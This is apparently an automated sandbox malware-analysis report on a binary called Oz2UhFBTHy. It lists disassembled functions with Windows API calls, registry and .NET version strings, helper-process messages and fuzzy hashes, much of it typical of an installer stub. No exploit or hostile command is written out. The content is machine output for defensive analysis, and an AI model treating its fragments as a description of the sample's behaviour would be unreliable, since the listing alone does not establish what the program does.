                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$FormatMessageOpen
                                                                                                      • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2812809588-1577016196
                                                                                                      • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                      • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                      • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                      • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                      Strings
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                      • v4.0.30319, xrefs: 004594F1
                                                                                                      • v1.1.4322, xrefs: 004595C2
                                                                                                      • v2.0.50727, xrefs: 0045955B
                                                                                                      • .NET Framework version %s not found, xrefs: 00459609
                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                      • .NET Framework not found, xrefs: 0045961D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$Open
                                                                                                      • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                      • API String ID: 2976201327-446240816
                                                                                                      • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                      • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                      • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                      • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                                                                      • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                                                                      • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                                                                      • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                                                                      • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                                                                      Strings
                                                                                                      • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                                                                      • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                                                                      • Helper isn't responding; killing it., xrefs: 00458A87
                                                                                                      • Helper process exited., xrefs: 00458AC5
                                                                                                      • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                      • API String ID: 3355656108-1243109208
                                                                                                      • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                                      • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                                                                      • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                                                                      • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                                                        • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                                                                      • , xrefs: 004545B1
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                                                                      • RegCreateKeyEx, xrefs: 004545C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2481121983-1280779767
                                                                                                      • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                      • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                                                                      • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                                                                      • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                                                                      APIs
                                                                                                        • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                        • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                                                                      • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                                                        • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                      • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                      • API String ID: 1549857992-2312673372
                                                                                                      • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                      • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                                                                      • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                                                                      • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                                                      • API String ID: 4190037839-2312295185
                                                                                                      • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                      • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                                                      • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                                                                      • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 004629FC
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                      • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                                                                      • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                                                                      • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 0042F194
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                      • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                                                      • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                                                                      • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,02153858,00000000), ref: 00458C79
                                                                                                      • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                                                                      • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                                                                      • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                      • String ID: CreateEvent$TransactNamedPipe
                                                                                                      • API String ID: 2182916169-3012584893
                                                                                                      • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                      • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                                                                      • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                                                                      • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                                                                      • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                                                        • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                      • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                      • API String ID: 1914119943-2711329623
                                                                                                      • Opcode ID: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                      • Instruction ID: d1bb8c6bfccdc0522a96f5e3020b18907c52df716e7671809b7eaf465cfb4023
                                                                                                      • Opcode Fuzzy Hash: e2963ea3afedc97cdb575031c9274042e2bd1e61e6c3a56a36b999a051922bf2
                                                                                                      • Instruction Fuzzy Hash: 6831A375A00604AFDB41EFAACC12D5BB7BDEB8970675244A6FD04D3352DB38DD08CA28
                                                                                                      APIs
                                                                                                      • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                                      • SaveDC.GDI32(?), ref: 00416E27
                                                                                                      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                                      • DeleteObject.GDI32(?), ref: 00416F22
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                                      • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 375863564-0
                                                                                                      • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                      • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                                      • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                                      • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                      • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                      • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                      • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
